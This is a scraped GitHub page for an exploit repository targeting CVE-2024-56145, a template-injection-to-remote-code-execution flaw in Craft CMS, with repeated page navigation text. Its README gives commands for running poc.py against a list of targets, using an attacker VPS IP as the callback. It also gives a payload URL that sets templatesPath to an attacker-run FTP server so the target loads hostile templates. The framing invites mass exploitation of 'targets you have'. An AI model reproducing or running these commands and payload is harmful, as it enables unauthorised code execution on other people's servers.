GitHub - Sachinart/CVE-2024-56145-craftcms-rce: CVE-2024-56145 SSTI to RCE

Before you run script again do

fuser -k 6666/tcp

Usage -

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

Custom command can be used like python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i is your IP or your vps IP (use that by doing ipconfig / ifconfig.

Like - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

Manual exploit , run above poc.py against targets you have, you will see output file with vuln targets

Now what? you have vuln target but wanted to play more? So I have added poc2.py this is for manual test against the target, how to do that? do fuser -k 6666/tcp

1. Run poc2.py (port 6666 started as FTP).
2. Open the browser yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. you will see -

Written By Chirag Artani (https://x.com/Chirag99Artani)

Name		Name	Last commit message	Last commit date
Latest commit History 9 Commits
README.md		README.md
poc-2.py		poc-2.py
poc.py		poc.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Before you run script again do

Usage -

Manual exploit , run above poc.py against targets you have, you will see output file with vuln targets

About

Releases

Packages

Languages

Sachinart/CVE-2024-56145-craftcms-rce

Folders and files

Latest commit

History

Repository files navigation

Before you run script again do

Usage -

Manual exploit , run above poc.py against targets you have, you will see output file with vuln targets

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages